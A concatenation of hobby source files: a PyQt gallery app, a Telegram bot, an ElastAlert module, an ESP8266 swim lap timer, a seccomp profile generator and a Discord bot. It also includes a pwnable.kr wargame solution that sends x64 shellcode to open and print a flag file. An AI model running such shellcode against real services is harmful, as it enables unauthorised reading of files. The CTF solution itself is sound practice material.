self.trashFolderHeader.setStyleSheet(self.label_to_change.styleSheet())
self.trashFolderHeader.setText("Trash")
self.trashFolderHeader.setAlignment(self.label_to_change.alignment())
self.trashFolderHeader.show()
self.animation.addAnimation(Animation.fadingAnimation(Animation, self.label_to_change , 200 , True))
self.animation.finished.connect(self.label_to_change.show)
self.animation.start()
self.animation = QParallelAnimationGroup()
self.animation.addAnimation(Animation.fadingAnimation(Animation , self.images , 200))
self.animation.addAnimation(Animation.fadingAnimation(Animation , self.label_to_change , 200))
self.animation.finished.connect(run_second)
self.animation.start()
def showDeleteOptions(self , directory , parent, pos):
try:
self.options.hide()
except:
pass
self.directory = directory
self.main_window.mousePressEvent = lambda pos : self.options.hide()
self.options = QLabel(parent)
self.options.setProperty("class" , "need")
self.options.setStyleSheet("""
border: 1px solid #4C566A;
""")
self.options.move(pos)
self.options.setFixedSize(QSize(200 , 100))
layout = QVBoxLayout()
        for layoutOption , func in zip(["Restore" , "Delete"] , [lambda : self.restoreImage(directory , parent) , lambda : self.confirmDelete()]):
label = QCustomButton(layoutOption , None).create()
label.clicked.connect(func)
label.setFixedHeight(50)
label.setStyleSheet("""
color: #D8DEE9;
font-size: 20px;
border: none
""")
layout.addWidget(label)
self.options.setLayout(layout)
self.options.show()
def restoreImage(self , directory , parent):
with open(os.path.join(os.path.expanduser("~") , ".galleryman" , "data" , "trashLogs.txt")) as f:
trashFiles = dict(json.loads(f.read()))
try:
dest = trashFiles.pop(directory)
except:
return
os.replace(directory , dest)
try:
self.trashItem.remove(parent)
except:
pass
self.responser()
self.popup.new_msg(self.main_window , "File restored" , 400)
def confirmDelete(self):
dialog = QDialog()
dialog.setStyleSheet('background-color: #2E3440')
layout = QVBoxLayout()
layout.setSpacing(20)
label = QLabel(text="Are you sure?")
label.setStyleSheet("color: #D8DEE9; font-size: 20px")
label.setAlignment(Qt.AlignCenter | Qt.AlignCenter)
layout.addWidget(label)
buttons = QHBoxLayout()
button1 = QCustomButton("Yes" , None).create()
button1.clicked.connect(self.deleteForEver)
button1.setStyleSheet("color: #D8DEE9; font-size: 20px")
buttons.addWidget(button1)
button1 = QCustomButton("No" , None).create()
button1.clicked.connect(dialog.hide)
button1.setStyleSheet("color: #D8DEE9; font-size: 20px")
buttons.addWidget(button1)
layout.addLayout(buttons)
dialog.setLayout(layout)
dialog.show()
dialog.exec_()
def deleteForEver(self):
os.remove(self.directory)
self.popup.new_msg(self.main_window , "Image Deleted Successfully" , 500)
def switchToAlbums(self):
if(self.currentWindow == "albums"): return
self.currentWindow = "albums"
def run_second():
self.label_to_change.setText("Albums")
self.trashFolderHeader.hide()
self.trashFoldersLayout.hide()
self.animation = QParallelAnimationGroup()
self.animation.addAnimation(Animation.fadingAnimation(Animation , self.images , 300 , True))
self.animation.addAnimation(Animation.fadingAnimation(Animation , self.label_to_change , 300 , True))
self.animation.start()
self.animation.finished.connect(self.images.show)
self.animation = QParallelAnimationGroup()
try:
self.animation.addAnimation(Animation.fadingAnimation(Animation , self.trashFolderHeader , 300))
except:
pass
self.animation.addAnimation(Animation.fadingAnimation(Animation , self.folderHeaderText , 300))
self.animation.finished.connect(run_second)
self.animation.start()
# Complete 1000 lines!
``` |
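The `QDoublePushButton` at the top of this file is a handy idiom on its own: the first click only arms a single-shot 250 ms timer, a second click inside that window emits `doubleClicked`, and the timeout re-emits the buffered `clicked`. A minimal self-contained sketch of the same pattern (the demo slots and button text are made up):
```python
import sys
from PyQt5.QtCore import QTimer, pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import QApplication, QPushButton

class DoubleClickButton(QPushButton):
    doubleClicked = pyqtSignal()
    clicked = pyqtSignal()  # shadows QPushButton.clicked on purpose

    def __init__(self, *args, **kwargs):
        QPushButton.__init__(self, *args, **kwargs)
        self.timer = QTimer(self)
        self.timer.setSingleShot(True)
        self.timer.timeout.connect(self.clicked.emit)  # no second click arrived
        super().clicked.connect(self.checkDoubleClick)

    @pyqtSlot()
    def checkDoubleClick(self):
        if self.timer.isActive():  # second click within 250 ms
            self.doubleClicked.emit()
            self.timer.stop()
        else:
            self.timer.start(250)

app = QApplication(sys.argv)
button = DoubleClickButton("click me")
button.clicked.connect(lambda: print("single click"))
button.doubleClicked.connect(lambda: print("double click"))
button.show()
app.exec_()
```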
{
"source": "0xSaurabh/monday-api",
"score": 3
} |
#### File: 0xSaurabh/monday-api/app.py
```python
from results.amizone import getAttendance, getDay, getAttendanceForDay
from flask import Flask, request, jsonify
import telegram
import datetime
import os
app = Flask(__name__)
TOKEN = os.environ.get('TOKEN')
AUTORES=os.environ.get('AUTORES')
bot = telegram.Bot(token=TOKEN)
defaultMessage = '''
Hi, I'm monday
Here are my commands:
/attendance - to list attendance of all subjects
/today - to show today's classes and their attendance
/attendanceForToday - show attendance for today's classes
/yesterday - show attendance for yesterday's classes
/tomorrow - show tomorrow's classes
'''
@app.route('/')
def default():
return 'monday api built using flask by @sksuryan'
@app.route('/{}'.format(TOKEN),methods=['post'])
def respond():
update = telegram.Update.de_json(request.get_json(),bot)
chatID = update.message.chat.id
reqdChatID = int(os.environ.get('CHATID'))
receivedMsg = update.message.text.encode('utf-8').decode()
response = ''
bot.sendChatAction(chatID, telegram.ChatAction.TYPING)
date = datetime.date.today()
if reqdChatID != chatID:
response = f'Sorry, monday is for personal use 😅'
else:
if receivedMsg == '/start':
response = defaultMessage
elif receivedMsg == '/attendance':
response = getAttendance()
elif receivedMsg == '/today':
date = date.strftime('%Y-%m-%d')
response = getDay(date)
elif receivedMsg == '/attendanceForToday':
date = date.strftime('%Y-%m-%d')
response = getAttendanceForDay(date)
elif receivedMsg == '/yesterday':
date = date - datetime.timedelta(days=1)
date = date.strftime('%Y-%m-%d')
response = getAttendanceForDay(date)
elif receivedMsg == '/tomorrow':
date = date + datetime.timedelta(days=1)
date = date.strftime('%Y-%m-%d')
response = getDay(date)
else:
response = defaultMessage
bot.sendMessage(chat_id=chatID, text=response)
return 'ok'
@app.route('/{}'.format(AUTORES))
def autores():
method = request.args.get('method')
chatID = os.environ.get('CHATID')
response = ''
date = datetime.date.today()
if method == 'attendance':
response = getAttendance()
elif method == 'today':
date = date.strftime('%Y-%m-%d')
response = getDay(date)
elif method == 'attendanceForToday':
date = date.strftime('%Y-%m-%d')
response = getAttendanceForDay(date)
elif method == 'tomorrow':
date = date + datetime.timedelta(days=1)
date = date.strftime('%Y-%m-%d')
response = getDay(date)
elif method == 'yesterday':
date = date - datetime.timedelta(days=1)
date = date.strftime('%Y-%m-%d')
response = getAttendanceForDay(date)
bot.sendMessage(chat_id=chatID, text=response)
return 'ok'
@app.route('/setwebhook', methods=['GET', 'POST'])
def set_webhook():
bot = telegram.Bot(token=os.environ.get('TOKEN'))
URL = f'https://{request.args.get("name")}.herokuapp.com/'
    # we use the bot object to link the bot to our app which lives
    # at the link provided by URL
s = bot.setWebhook('{URL}{HOOK}'.format(URL=URL, HOOK=os.environ.get('TOKEN')))
# something to let us know things work
if s:
return "webhook setup ok"
else:
return "webhook setup failed"
if __name__ == '__main__':
app.run()
``` |
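Once deployed, the `/setwebhook` route above has to be hit once so Telegram knows where to POST updates; it builds the webhook URL as `https://<name>.herokuapp.com/<TOKEN>`. A minimal sketch using a hypothetical app name:
```python
import requests

# "my-monday-bot" is a made-up Heroku app name; substitute your own
resp = requests.get(
    "https://my-monday-bot.herokuapp.com/setwebhook",
    params={"name": "my-monday-bot"},
)
print(resp.text)  # "webhook setup ok" on success
```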
{
"source": "0xSeb/elastalert_hour_range",
"score": 3
} |
#### File: elastalert_hour_range/elastalert_modules/hour_range_enhancement.py
```python
import dateutil.parser
from elastalert.enhancements import BaseEnhancement
from elastalert.enhancements import DropMatchException
class HourRangeEnhancement(BaseEnhancement):
def process(self, match):
timestamp = None
try:
timestamp = dateutil.parser.parse(match['@timestamp']).time()
except Exception:
try:
timestamp = dateutil.parser.parse(match[self.rule['timestamp_field']]).time()
except Exception:
pass
if timestamp is not None:
time_start = dateutil.parser.parse(self.rule['start_time']).time()
time_end = dateutil.parser.parse(self.rule['end_time']).time()
if(self.rule['drop_if'] == 'outside'):
if timestamp < time_start or timestamp > time_end:
raise DropMatchException()
elif(self.rule['drop_if'] == 'inside'):
if timestamp >= time_start and timestamp <= time_end:
raise DropMatchException()
``` |
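A quick sketch of how the enhancement behaves, driving `process()` directly with a hand-built rule and match. The times and the `drop_if` value here are made up; in a real deployment they come from the rule YAML:
```python
from elastalert.enhancements import DropMatchException
from elastalert_modules.hour_range_enhancement import HourRangeEnhancement

rule = {
    "timestamp_field": "@timestamp",
    "start_time": "09:00",
    "end_time": "17:00",
    "drop_if": "outside",  # keep only matches between 09:00 and 17:00
}
enhancement = HourRangeEnhancement(rule)

match = {"@timestamp": "2021-06-01T03:30:00Z"}
try:
    enhancement.process(match)
    print("match kept")
except DropMatchException:
    print("match dropped")  # 03:30 falls outside the window
```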
{
"source": "0xSebin/SwimTime.github.io",
"score": 3
} |
#### File: SwimTime.github.io/esp8266/ads1x15.py
```python
import ustruct
import time
_REGISTER_MASK = const(0x03)
_REGISTER_CONVERT = const(0x00)
_REGISTER_CONFIG = const(0x01)
_REGISTER_LOWTHRESH = const(0x02)
_REGISTER_HITHRESH = const(0x03)
_OS_MASK = const(0x8000)
_OS_SINGLE = const(0x8000) # Write: Set to start a single-conversion
_OS_BUSY = const(0x0000) # Read: Bit=0 when conversion is in progress
_OS_NOTBUSY = const(0x8000) # Read: Bit=1 when device is not performing a conversion
_MUX_MASK = const(0x7000)
_MUX_DIFF_0_1 = const(0x0000) # Differential P = AIN0, N = AIN1 (default)
_MUX_DIFF_0_3 = const(0x1000) # Differential P = AIN0, N = AIN3
_MUX_DIFF_1_3 = const(0x2000) # Differential P = AIN1, N = AIN3
_MUX_DIFF_2_3 = const(0x3000) # Differential P = AIN2, N = AIN3
_MUX_SINGLE_0 = const(0x4000) # Single-ended AIN0
_MUX_SINGLE_1 = const(0x5000) # Single-ended AIN1
_MUX_SINGLE_2 = const(0x6000) # Single-ended AIN2
_MUX_SINGLE_3 = const(0x7000) # Single-ended AIN3
_PGA_MASK = const(0x0E00)
_PGA_6_144V = const(0x0000) # +/-6.144V range = Gain 2/3
_PGA_4_096V = const(0x0200) # +/-4.096V range = Gain 1
_PGA_2_048V = const(0x0400) # +/-2.048V range = Gain 2 (default)
_PGA_1_024V = const(0x0600) # +/-1.024V range = Gain 4
_PGA_0_512V = const(0x0800) # +/-0.512V range = Gain 8
_PGA_0_256V = const(0x0A00) # +/-0.256V range = Gain 16
_MODE_MASK = const(0x0100)
_MODE_CONTIN = const(0x0000) # Continuous conversion mode
_MODE_SINGLE = const(0x0100) # Power-down single-shot mode (default)
_DR_MASK = const(0x00E0)
_DR_128SPS = const(0x0000) # 128 samples per second
_DR_250SPS = const(0x0020) # 250 samples per second
_DR_490SPS = const(0x0040) # 490 samples per second
_DR_920SPS = const(0x0060) # 920 samples per second
_DR_1600SPS = const(0x0080) # 1600 samples per second (default)
_DR_2400SPS = const(0x00A0) # 2400 samples per second
_DR_3300SPS = const(0x00C0) # 3300 samples per second
_CMODE_MASK = const(0x0010)
_CMODE_TRAD = const(0x0000) # Traditional comparator with hysteresis (default)
_CMODE_WINDOW = const(0x0010) # Window comparator
_CPOL_MASK = const(0x0008)
_CPOL_ACTVLOW = const(0x0000) # ALERT/RDY pin is low when active (default)
_CPOL_ACTVHI = const(0x0008) # ALERT/RDY pin is high when active
_CLAT_MASK = const(0x0004) # Determines if ALERT/RDY pin latches once asserted
_CLAT_NONLAT = const(0x0000) # Non-latching comparator (default)
_CLAT_LATCH = const(0x0004) # Latching comparator
_CQUE_MASK = const(0x0003)
_CQUE_1CONV = const(0x0000) # Assert ALERT/RDY after one conversions
_CQUE_2CONV = const(0x0001) # Assert ALERT/RDY after two conversions
_CQUE_4CONV = const(0x0002) # Assert ALERT/RDY after four conversions
_CQUE_NONE = const(0x0003) # Disable the comparator and put ALERT/RDY in high state (default)
_GAINS = (
_PGA_6_144V, # 2/3x
_PGA_4_096V, # 1x
_PGA_2_048V, # 2x
_PGA_1_024V, # 4x
_PGA_0_512V, # 8x
_PGA_0_256V # 16x
)
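# With the 16-bit ADS1115, each entry above picks the full-scale range and one
# LSB is FS/32768 (e.g. the 4.096 V range resolves 125 uV per count)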
_CHANNELS = (_MUX_SINGLE_0, _MUX_SINGLE_1, _MUX_SINGLE_2, _MUX_SINGLE_3)
_DIFFS = {
(0, 1): _MUX_DIFF_0_1,
(0, 3): _MUX_DIFF_0_3,
(1, 3): _MUX_DIFF_1_3,
(2, 3): _MUX_DIFF_2_3,
}
class ADS1115:
def __init__(self, i2c, address=0x49):
self.i2c = i2c
self.address = address
self.gain = 0 # 2/3 6.144V
def _write_register(self, register, value):
data = ustruct.pack('>BH', register, value)
self.i2c.writeto(self.address, data)
def _read_register(self, register):
self.i2c.start()
self.i2c.write(ustruct.pack('>BB', self.address << 1, register))
data = self.i2c.readfrom(self.address, 2)
return ustruct.unpack('>h', data)[0]
def read(self, channel):
self._write_register(_REGISTER_CONFIG, _CQUE_NONE | _CLAT_NONLAT |
_CPOL_ACTVLOW | _CMODE_TRAD | _DR_1600SPS | _MODE_SINGLE |
_OS_SINGLE | _GAINS[self.gain] | _CHANNELS[channel])
while not self._read_register(_REGISTER_CONFIG) & _OS_NOTBUSY:
time.sleep_ms(1)
return self._read_register(_REGISTER_CONVERT)
def diff(self, channel1, channel2):
self._write_register(_REGISTER_CONFIG, _CQUE_NONE | _CLAT_NONLAT |
_CPOL_ACTVLOW | _CMODE_TRAD | _DR_1600SPS | _MODE_SINGLE |
_OS_SINGLE | _GAINS[self.gain] | _DIFFS[(channel1, channel2)])
while not self._read_register(_REGISTER_CONFIG) & _OS_NOTBUSY:
time.sleep_ms(1)
return self._read_register(_REGISTER_CONVERT)
def alert_start(self, channel, threshold):
self._write_register(_REGISTER_HITHRESH, threshold)
        self._write_register(_REGISTER_CONFIG, _CQUE_1CONV | _CLAT_LATCH |
            _CPOL_ACTVLOW | _CMODE_TRAD | _DR_1600SPS | _MODE_CONTIN |
            _GAINS[self.gain] | _CHANNELS[channel])
def alert_read(self):
return self._read_register(_REGISTER_CONVERT)
class ADS1015(ADS1115):
def __init__(self, i2c, address=0x48):
return super().__init__(i2c, address)
def read(self, channel):
return super().read(channel) >> 4
def diff(self, channel1, channel2):
return super().diff(channel1, channel2) >> 4
def alert_start(self, channel, threshold):
return super().alert_start(channel, threshold << 4)
def alert_read(self):
return super().alert_read() >> 4
```
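The driver returns raw signed counts; volts are just the full-scale range of the selected gain divided by 2^15. A minimal MicroPython sketch, assuming the same wiring as `main.py` below (SCL on pin 5, SDA on pin 4):
```python
import machine
import ads1x15

# Full-scale voltage per gain index, mirroring the _GAINS table above
FULL_SCALE = (6.144, 4.096, 2.048, 1.024, 0.512, 0.256)

i2c = machine.I2C(scl=machine.Pin(5), sda=machine.Pin(4), freq=100000)
adc = ads1x15.ADS1115(i2c)
adc.gain = 1  # +/-4.096 V range

raw = adc.read(0)  # signed 16-bit count from channel 0
volts = raw * FULL_SCALE[adc.gain] / 32768
print(volts)
```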
#### File: SwimTime.github.io/esp8266/main.py
```python
import ads1x15
import network
import time
import math
import machine
from umqtt.simple import MQTTClient
import micropython
from micropython import const
from machine import Pin
"""
Define constant values
"""
run = False
lapnr = 3 #default lap number
temp = 0.0
wifi_ssid = "Alfabeta"
wifi_pswd = "<PASSWORD>"
server = "io.adafruit.com"
user = "kk2314"
passwd = "<PASSWORD>"
mqtt_temp = "kk2314/feeds/temp"
mqtt_time = "kk2314/feeds/time"
mqtt_rawdata = "kk2314/feeds/rawdata"
mqtt_control = "kk2314/feeds/control"
mqtt_stat = "kk2314/feeds/stat"
mqtt_debug = "kk2314/feeds/debug"
mqtt_tempalert = "kk2314/feeds/tempalert"
"""
Define pins for LED and buzzer
"""
red = Pin(0, Pin.OUT)
blue = Pin(2, Pin.OUT)
p12 = machine.Pin(12)
buzz = machine.PWM(p12)
#function to blink LED
def blink_LED(colour):
colour.off()
time.sleep_ms(50)
colour.on()
time.sleep_ms(50)
#setting up I2C for range finder/ set up ADC
i2c = machine.I2C(scl=machine.Pin(5), sda=machine.Pin(4), freq=100000)
adc = ads1x15.ADS1115(i2c)
adc.gain = 1 #ADS1015_REG_CONFIG_PGA_4_096V
#setting up I2C for temp sens
i2c_temp = machine.I2C(scl=machine.Pin(14), sda=machine.Pin(13), freq=100000)
#Received messages from subscriptions will be delivered to this callback
def sub_cb(topic, msg):
global state
global run
global lapnr
global temp
print((topic, msg))
#Check for messages only for the control topic
if topic == b"kk2314/feeds/control":
if msg == b"start":
run = True
elif msg.decode() == "temp":
get_temp()
payload_temp = "{}".format(temp)
c.publish(mqtt_temp,payload_temp)
print(temp)
else:
lapnr = int(msg)
print(lapnr)
"""
Connect to the wifi
"""
sta_if = network.WLAN(network.STA_IF)
sta_if.active(True)
sta_if.scan()
sta_if.connect(wifi_ssid, wifi_pswd)
print('Connecting to Wi-Fi')
#while connecting blink LED and wait
while not sta_if.isconnected():
blink_LED(red)
pass
print('Wifi connected')
#Turn red LED on (active-low)
red.off()
# Turn off ESP8266's AP
ap_if = network.WLAN(network.AP_IF)
ap_if.active(False)
#Converts the data received from ultrasonic sensor into meters
def convert(data):
global distance
distance = data/10000
distance = distance/0.000976562 #vcc/(1025*5)
distance = (distance/1000)+0.16 #distance offset
#Send a read request to the temp sensor and convert the reading into degrees Celsius
def get_temp():
global temp
i2c_temp.writeto(0x40, bytearray([0xf3]))
time.sleep(0.5)
data=i2c_temp.readfrom(0x40, 2)
tempraw=int.from_bytes(data, "big")
temp = 175.72 * tempraw / 65536
temp = temp - 46.85
#sets up the buzzer to run a countdown composed of 3 short beeps and a long one
def countdown():
count = 0
freq = 300
while count < 3:
buzz.freq(400)
buzz.duty(512)
time.sleep(0.7)
buzz.duty(1023)
time.sleep(0.7)
count = count + 1
buzz.freq(500)
buzz.duty(512)
time.sleep(1.25)
buzz.duty(1023)
#converts secs into min and seconds
def format(sec):
sec = sec/1000
mins, secs = divmod( sec, 60)
secs = round(secs, 3)
return (mins, secs)
#main() function which executes sensing and mqtt push
def main(server):
global run
global lapnr
global nr
global c
global mqttConnected
"""
Defines which client to connect to.
Using adafruit.io broker requires authentification
so we also set username and password
"""
c = MQTTClient("Sensor boards", server, user = user, password = <PASSWORD>)
c.set_callback(sub_cb)
#umqtt's connect() returns the CONNACK session-present flag,
#so False here means a fresh clean session was established
if c.connect() == False:
mqttConnected = True
print('MQTT Connected')
#subscribe to the topic where controls are received
c.subscribe("kk2314/feeds/control")
while True:
#flip this flag to reach the non-blocking check_msg() branch below,
#which is otherwise dead code duplicating this one
if True:
c.wait_msg() #blocking check for message
#start timing laps
if run == True:
#reset the run flag
run = False
#do countdown
countdown()
c.publish(mqtt_debug,"Started countdown")
#start timer
start = time.ticks_ms()
c.publish(mqtt_debug,"Timer started")
print("go")
#wait for user to go away from sensor
time.sleep(5)
#resets statistical variables every beginning of run
lap_index = 0
best_lap= 0
avr_lap = 0
total_time= 0
worst_lap = 0
#main while loop which continues until lapnr goes to 0
while lapnr > 0:
blink_LED(blue)
data = adc.read(0)
convert(data)
#if sensor detects object within threshold it times a lap
if distance < 0.80:
lap_time_raw = time.ticks_diff(time.ticks_ms(), start)
#reset time measure
start = time.ticks_ms()
c.publish(mqtt_debug, "Lap end detected")
lap_index = lap_index + 1
total_time = total_time + lap_time_raw
#check if the lap is the slowest
if lap_time_raw > worst_lap:
worst_lap = lap_time_raw
worst_index = lap_index
#update average lap_time
avr_lap = total_time/lap_index
#check if lap is the fastest
if lap_index == 1:
best_lap = lap_time_raw
best_index = 1
elif lap_time_raw < best_lap:
best_lap = lap_time_raw
best_index = lap_index
#format all the statistical values in mins, secs
mins_av, secs_av = format(avr_lap)
mins_bs, secs_bs = format(best_lap)
mins_ws, secs_ws = format(worst_lap)
mins_to, secs_to = format(total_time)
mins, secs = format(lap_time_raw)
#read current temp
get_temp()
#send alert if temperature is outside ideal range
if temp > 21 and temp < 29:
c.publish(mqtt_tempalert, "Temperature is ideal for a splash, Happy Swimming!")
elif temp < 21:
c.publish(mqtt_tempalert, "Careful! We have detected temperature is outside ideal range (Too low)")
elif temp > 29:
c.publish(mqtt_tempalert, "Careful! We have detected temperature is outside ideal range (Too high)")
#encode all data to JSON - manually to save memory
payload_temp = "{}".format(temp)
payload = " Lap number {} was: {} m {} s. ".format( lap_index, mins, secs)
payload_raw = "{}".format(lap_time_raw/1000)
payload_stat_av = "Average lap time is : {} m {} s ".format(mins_av,secs_av)
payload_stat_bs = "Best lap was lap number {} : {} m {} s ".format(best_index,mins_bs,secs_bs)
payload_stat_ws = "Worst lap was lap number {} : {} m {} s ".format(worst_index,mins_ws,secs_ws)
payload_stat_to = "Total time is : {} m {} s ".format(mins_to,secs_to)
#publish converted and raw data to mqtt broker
c.publish(mqtt_time,payload)
c.publish(mqtt_rawdata, payload_raw)
c.publish(mqtt_temp,payload_temp)
c.publish(mqtt_stat,payload_stat_av)
c.publish(mqtt_stat,payload_stat_bs)
c.publish(mqtt_stat,payload_stat_ws)
c.publish(mqtt_stat,payload_stat_to)
c.publish(mqtt_debug, "Data published successfully")
lapnr = lapnr - 1
#wait for 10 sec for object to get out of range of sensor
if lapnr != 0:
time.sleep(10)
c.publish(mqtt_debug, "Done with current run") #debug messages
else:
c.check_msg() #non-blocking check for message
#start timing laps
if run == True:
#reset the run flag
run = False
#do countdown
countdown()
c.publish(mqtt_debug,"Started countdown")
#start timer
start = time.ticks_ms()
c.publish(mqtt_debug,"Timer started")
print("go")
#wait for user to go away from sensor
time.sleep(5)
#resets statistical variables every beginning of run
lap_index = 0
best_lap= 0
avr_lap = 0
total_time= 0
worst_lap = 0
#main while loop which continues until lapnr goes to 0
while lapnr > 0:
blink_LED(blue)
data = adc.read(0)
convert(data)
#if sensor detects object within threshold it times a lap
if distance < 0.80:
lap_time_raw = time.ticks_diff(time.ticks_ms(), start)
#reset time measure
start = time.ticks_ms()
c.publish(mqtt_debug, "Lap end detected")
lap_index = lap_index + 1
total_time = total_time + lap_time_raw
#check if the lap is the slowest
if lap_time_raw > worst_lap:
worst_lap = lap_time_raw
worst_index = lap_index
#update average lap_time
avr_lap = total_time/lap_index
#check if lap is the fastest
if lap_index == 1:
best_lap = lap_time_raw
best_index = 1
elif lap_time_raw < best_lap:
best_lap = lap_time_raw
best_index = lap_index
#format all the statistical values in mins, secs
mins_av, secs_av = format(avr_lap)
mins_bs, secs_bs = format(best_lap)
mins_ws, secs_ws = format(worst_lap)
mins_to, secs_to = format(total_time)
mins, secs = format(lap_time_raw)
#read current temp
get_temp()
#send alert if temperature is outside ideal range
if temp > 21 and temp < 29:
c.publish(mqtt_tempalert, "Temperature is ideal for a splash, Happy Swimming!")
elif temp < 21:
c.publish(mqtt_tempalert, "Careful! We have detected temperature is outside ideal range (Too low)")
elif temp > 29:
c.publish(mqtt_tempalert, "Careful! We have detected temperature is outside ideal range (Too high)")
#encode all data to JSON - manually to save memory
payload_temp = "{}".format(temp)
payload = " Lap number {} was: {} m {} s. ".format( lap_index, mins, secs)
payload_raw = "{}".format(lap_time_raw/1000)
payload_stat_av = "Average lap time is : {} m {} s ".format(mins_av,secs_av)
payload_stat_bs = "Best lap was lap number {} : {} m {} s ".format(best_index,mins_bs,secs_bs)
payload_stat_ws = "Worst lap was lap number {} : {} m {} s ".format(worst_index,mins_ws,secs_ws)
payload_stat_to = "Total time is : {} m {} s ".format(mins_to,secs_to)
#publish converted and raw data to mqtt broker
c.publish(mqtt_time,payload)
c.publish(mqtt_rawdata, payload_raw)
c.publish(mqtt_temp,payload_temp)
c.publish(mqtt_stat,payload_stat_av)
c.publish(mqtt_stat,payload_stat_bs)
c.publish(mqtt_stat,payload_stat_ws)
c.publish(mqtt_stat,payload_stat_to)
c.publish(mqtt_debug, "Data published successfully")
lapnr = lapnr - 1
#wait for 10 sec for object to get out of range of sensor
if lapnr != 0:
time.sleep(10)
c.publish(mqtt_debug, "Done with current run") #debug messages
c.disconnect()
if __name__ == "__main__":
main(server)
``` |
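The `format()` helper above converts a millisecond tick count into whole minutes plus seconds rounded to three decimals; a standalone check of the same divmod arithmetic:
```python
def fmt_ms(ms):
    secs = ms / 1000
    mins, secs = divmod(secs, 60)
    return mins, round(secs, 3)

# 95,250 ms of lap time -> 1 minute, 35.25 seconds
assert fmt_ms(95250) == (1.0, 35.25)
```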
{
"source": "0xShad3/cybersec-writeups",
"score": 2
} |
#### File: pwnable.kr/asm/exploit.py
```python
from pwn import *
context.update(arch="amd64",os="linux",bit=64)
rssh = ssh(host="pwnable.kr",port=2222,user="asm",password="<PASSWORD>")
p = rssh.connect_remote("localhost",9026)
def pwn(shellcode):
p.recvuntil("give me your x64 shellcode:")
p.send(shellcode)
p.interactive()
p.close()
# renamed: a function named "shellcraft" would shadow pwnlib's shellcraft
# module and make shellcraft.pushstr below raise AttributeError
def use_shellcraft():
shellcode = shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
shellcode += shellcraft.open('rsp', 0, 0)
shellcode += shellcraft.read('rax', 'rsp', 100)
shellcode += shellcraft.write(1, 'rsp', 100)
shellcode += shellcraft.exit()
pwn(shellcode)
def hcAssembly():
shellcode = asm("""
xor rax,rax
xor rdi,rdi
xor rsi,rsi
xor rdx,rdx
jmp init
open:
pop rdi
mov rax,2
syscall
read:
mov rdi,rax
mov rsi,rsp
mov rdx,0x40
xor rax,rax
syscall
write:
mov rdi,1
mov rdx,40
mov rax,1
syscall
exit:
mov rax,0x3c
syscall
init:
call open
.ascii "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong"
.byte 0
""")
pwn(shellcode)
while(1):
print("There are two ways to exploit this either by hardcoded assembly (1) \n or by using pwnlib's shellcrafting")
selection = input()
if (selection == 1):
hcAssembly()
exit(0)
elif (selection == 2):
shellcraft()
``` |
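Both payloads issue the same four x86-64 Linux syscalls; for reference, the numbers the hand-written assembly loads into `rax` (note the write length is decimal 40 while the read buffer is 0x40 = 64 bytes):
```python
# x86-64 Linux syscall numbers used by the shellcode above.
SYSCALLS = {
    "read":  0,     # xor rax,rax
    "write": 1,     # mov rax,1
    "open":  2,     # mov rax,2
    "exit":  0x3c,  # mov rax,0x3c (60)
}
```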
{
"source": "0xSmiley/Runtime",
"score": 2
} |
#### File: Runtime/Tracer/seccompGenerator.py
```python
import sys
firstPart="""
{
"defaultAction": "SCMP_ACT_ERRNO",
"syscalls": [
{
"names": [
"""
secondPart=""" "$" """
thirdPart="""
],
"action": "SCMP_ACT_ALLOW"
}
]
}
"""
def EbpfMode(uts):
syscalls=[]
fd=open("Captures/"+uts+".json", "w")
fd.write(firstPart)
with open("Captures/"+uts+'.cap') as log:
line=log.readline()
line=log.readline()
while line:
parts=line.split(';')
syscall=parts[3].strip()
if syscall not in syscalls:
if len(syscalls) != 0:
fd.write(',\n')
if syscall == "newuname":
newModule=secondPart.replace('$',"uname")
fd.write(newModule)
fd.write(',\n')
elif syscall == "newstat":
newModule=secondPart.replace('$',"stat")
fd.write(newModule)
fd.write(',\n')
elif syscall == "newfstatat":
newModule=secondPart.replace('$',"fstatat")
fd.write(newModule)
fd.write(',\n')
elif syscall == "newfstat":
newModule=secondPart.replace('$',"fstat")
fd.write(newModule)
fd.write(',\n')
elif syscall == "newlstat":
newModule=secondPart.replace('$',"lstat")
fd.write(newModule)
fd.write(',\n')
module=secondPart.replace('$',syscall)
fd.write(module)
syscalls.append(syscall)
line=log.readline()
fd.write(thirdPart)
fd.close()
log.close()
def standardMode(path):
syscallList=[]
with open(path) as log:
line=log.readline()
fd=open("outputSeccomp.json", "w")
fd.write(firstPart)
while line:
syscall=line.strip()
if syscall not in syscallList:
if len(syscallList) != 0:
fd.write(',\n')
module=secondPart.replace('$',syscall)
fd.write(module)
syscallList.append(syscall)
line=log.readline()
fd.write(thirdPart)
fd.close()
log.close()
if len(sys.argv) > 1:
path = sys.argv[1]
if path != "":
standardMode(path)
``` |
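`standardMode` expects a plain-text file with one syscall name per line and writes a whitelist profile; a hypothetical end-to-end run (the capture filename is illustrative):
```python
from seccompGenerator import standardMode  # the function defined above

# Hypothetical capture: one syscall per line, duplicates allowed.
with open("captured_syscalls.txt", "w") as f:
    f.write("read\nwrite\nopen\nread\n")

standardMode("captured_syscalls.txt")
# outputSeccomp.json now allows read/write/open once each and denies
# everything else via "defaultAction": "SCMP_ACT_ERRNO".
```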
{
"source": "0xsmoos/PMD",
"score": 3
} |
#### File: 0xsmoos/PMD/bot.py
```python
import time
from threading import Thread
import discord
from requests.exceptions import MissingSchema
from discord.ext import commands, tasks
from scraper import Scraper
from errors import NoResults
import config as cfg
import media
import download
credentials = media.read_file("credentials.md", filter=True)
scraper = Scraper()
token = credentials[0]
allowed_users = credentials[1:]
channel_id = {
"commands": 776367990560129066,
"log": 776354053222826004,
"spam": 780948981299150888,
}
bot = commands.Bot(command_prefix=
[
"beta ",
"Beta ",
"BETA ",
"test ",
],
help_command=None, case_insensitive=True)
# |
# Discord Functions |
# V
@bot.event
async def on_ready():
check_logs.start()
print(f"{bot.user} successfuly connected!")
await set_status("Free Movies on Plex!", discord.Status.online)
@bot.listen("on_message")
async def on_message(message):
if not message.content.startswith("https://gomovies-online."): return
if message.channel.id != channel_id["commands"]: return
if message.author == bot.user: return
await send("Testing link...", silent=False)
# if "--res=" in message.content:
